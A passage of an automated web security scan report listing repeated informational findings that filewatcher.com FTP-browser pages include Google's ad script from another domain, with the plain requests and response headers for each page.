Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "5CRAnSxQqpTHPsP0MN+zSw"
Content-Length: 9639
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 485
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.852. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7h7me37ew+svpwGC/ziMgQ"
Content-Length: 26281
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 508
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.853. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.3-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:34 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QxWQV7WmtsVIm6SQAOypAw"
Content-Length: 51450
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 508
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.854. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IrvLvAi/RbR1UGdEF8E3rg"
Content-Length: 26284
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 497
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.855. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-6.4-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GD6KFkW1EUSA45sW5RuB5g"
Content-Length: 21282
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 499
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.856. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:29 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "xuLMAyL5YfFrfRhd9lAs2w"
Content-Length: 26105
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 487
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.857. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable/Latest.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable/Latest.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7-stable/Latest.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IcogOyFpADQGBut0IOKEFg"
Content-Length: 19802
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 495
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.858. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "5YPceyKcJeMh8qIzKrwOeg"
Content-Length: 26281
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 503
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.859. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "l9Xxaj92VV7aMBMxOsZ0mw"
Content-Length: 29544
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 506
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.860. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZZ3aysPG32EoKXFWWVX8oA"
Content-Length: 26284
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 486
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.861. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "z+lTU4+1M6v2pPjoHGrOuw"
Content-Length: 21941
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 486
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.862. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/Latest.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/Latest.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/Latest.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BHT8fUvxr6sayQr/7dJ2XA"
Content-Length: 20191
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 485
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.863. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/news.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/news.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/news.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:27 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MVHw/LqATGmDO6dC5DDb5w"
Content-Length: 20811
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 486
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.864. http://www.filewatcher.com/b/ftp/ftp.kd85.com.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/8oT0IAJmn7Hqp6uXjAtfQ"
Content-Length: 4911
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 638
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/ - FTP Browser</tit
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.865. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/EkQlK1lrxpEnMbonF8cZQ"
Content-Length: 5916
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 630
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/ - FTP Browser<
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.866. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com/pub/OpenBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "yjqPIrp84q6ixf79hIl4Hw"
Content-Length: 11022
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 638
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.867. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.8.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com/pub/OpenBSD/3.8.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.8.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
